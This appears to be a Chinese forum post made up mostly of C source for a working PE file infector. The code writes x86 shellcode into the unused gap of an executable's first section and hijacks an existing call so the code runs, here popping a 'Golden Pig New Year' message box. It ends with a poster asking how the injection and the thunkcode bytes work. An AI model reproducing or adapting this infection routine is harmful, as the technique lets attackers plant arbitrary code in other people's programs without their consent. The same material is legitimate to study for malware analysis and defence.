/**************************************************************
* 函数:InjectCode
* 参数:char szHostFile[]--待感染的exe文件路径
* 功能:感染一个exe程序,运行显示“金猪拜年”的MessageBox
**************************************************************/
int InjectCode(char szHostFile[])
{//#include <windows.h>
PIMAGE_DOS_HEADER pImageDosHeader ;
PIMAGE_NT_HEADERS pImageNtHeaders ;
PIMAGE_SECTION_HEADER pImageSectionHeader;
unsigned char thunkcode[] = "\x60\x9c\xe8\x00\x00\x00\x00\x5b"
"\x81\xeb\x0d\x10\x40\x00\x6a\x00"
"\x8d\x83\x30\x10\x40\x00\x50\x50"
"\x6a\x00\xb8\x78\x56\x34\x12\xff"
"\xd0\x9d\x61\xff\x25\x3a\x10\x40"
"\x00\x90\xBD\xF0\xD6\xED\xB0\xDD"
"\xC4\xEA\x00";
HANDLE hFile ;
HANDLE hMap ;
LPVOID pMapping ;
DWORD dwGapSize ;
unsigned char *pGapEntry ;
int i ;
PROC MsgBox ;
DWORD OldEntry ;
int x = 0x18 ;
int vir_len ;
unsigned char *pSearch ;
DWORD *dwCallNextAddr ;
//DWORD *dwCallDataOffset ;
DWORD *dwCallDataAddr ;
//DWORD dwCallData ;
DWORD dwCodeDistance ;
DWORD *dwJmpAddr ;
DWORD dwJmpData ;
DWORD dwJmpVA ;
//:::
hFile = CreateFile(szHostFile,
FILE_SHARE_READ|FILE_SHARE_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL) ;
if (hFile==INVALID_HANDLE_VALUE)
{
return -1 ;
}
hMap = CreateFileMapping(hFile,
NULL,
PAGE_READWRITE,
0,
0,
NULL) ;
if (!hMap)
return -1 ;
pMapping = MapViewOfFile(hMap,
FILE_MAP_ALL_ACCESS,
0,
0,
0) ;
if (!pMapping)
return -1 ;
pImageDosHeader = (PIMAGE_DOS_HEADER)pMapping ;
if (pImageDosHeader->e_magic==IMAGE_DOS_SIGNATURE)
{
pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)pMapping+pImageDosHeader->e_lfanew) ;
if (pImageNtHeaders->Signature==IMAGE_NT_SIGNATURE)
{
pImageSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)pMapping+
pImageDosHeader->e_lfanew+
sizeof(IMAGE_NT_HEADERS)) ;
dwGapSize = pImageSectionHeader->SizeOfRawData - pImageSectionHeader->Misc.VirtualSize ;
if (sizeof(thunkcode)>dwGapSize)
goto Close ;
pGapEntry = (unsigned char *)(pImageSectionHeader->PointerToRawData+
(DWORD)pMapping+
pImageSectionHeader->Misc.VirtualSize) ;
OldEntry = pImageNtHeaders->OptionalHeader.ImageBase+
pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ;
MsgBox = (PROC)GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA") ;
//修改为当前系统的MessageBoxA地址
for (i=3;i>=0;i--)
{
thunkcode[i+27] = ((unsigned int)MsgBox>>x)&0xff ;
x -= 8 ;
}
x = 24 ;
vir_len = (int)pImageSectionHeader->Misc.VirtualSize ;
pSearch = (unsigned char *)(pImageSectionHeader->PointerToRawData+
(DWORD)pMapping) ;
//:::搜索call指令(0xe8)
for (i=0;i<vir_len;i++)
{
if (pSearch[i]==0xe8)
{
dwCallDataAddr = (DWORD *)(&pSearch[i]+1) ;
dwCallNextAddr=(DWORD *)(&pSearch[i]+5) ;
dwJmpAddr = (DWORD *)(*dwCallDataAddr+ (DWORD)dwCallNextAddr) ;
dwJmpVA = (DWORD)dwJmpAddr-
((DWORD)pMapping+pImageSectionHeader->PointerToRawData)+
pImageNtHeaders->OptionalHeader.ImageBase+
pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ;
dwJmpData = *((DWORD *)((unsigned char *)dwJmpAddr+2)) ;
if ((*dwJmpAddr&0xffff)==0x25ff)
{
dwCodeDistance = (DWORD)pGapEntry - (DWORD)dwCallNextAddr ;
*dwCallDataAddr = dwCodeDistance ;
for (i=3;i>=0;i--)
{
thunkcode[i+37] = ((unsigned int)dwJmpData>>x)&0xff ;
x -= 8 ;
}
for (i=0;i<sizeof(thunkcode);i++)
{
pGapEntry[i] = thunkcode[i] ;
}
break ;
}
}
}
}
}
Close:
UnmapViewOfFile(pMapping) ;
CloseHandle(hMap) ;
CloseHandle(hFile) ;
return 0 ;
}
上面注释写的清楚,是给一个可执行文件加段显示“金猪拜年”的MessageBox,不明白,抓不住思路,请高手帮忙讲下流程和原理,谢谢了,不知道“金猪拜年”的MessageBox是怎么插入的,还有unsigned char thunkcode[]里面定义的是什么意思啊?看不懂,在PE什么段里插代码??
[课程]Android-CTF解题方法汇总!
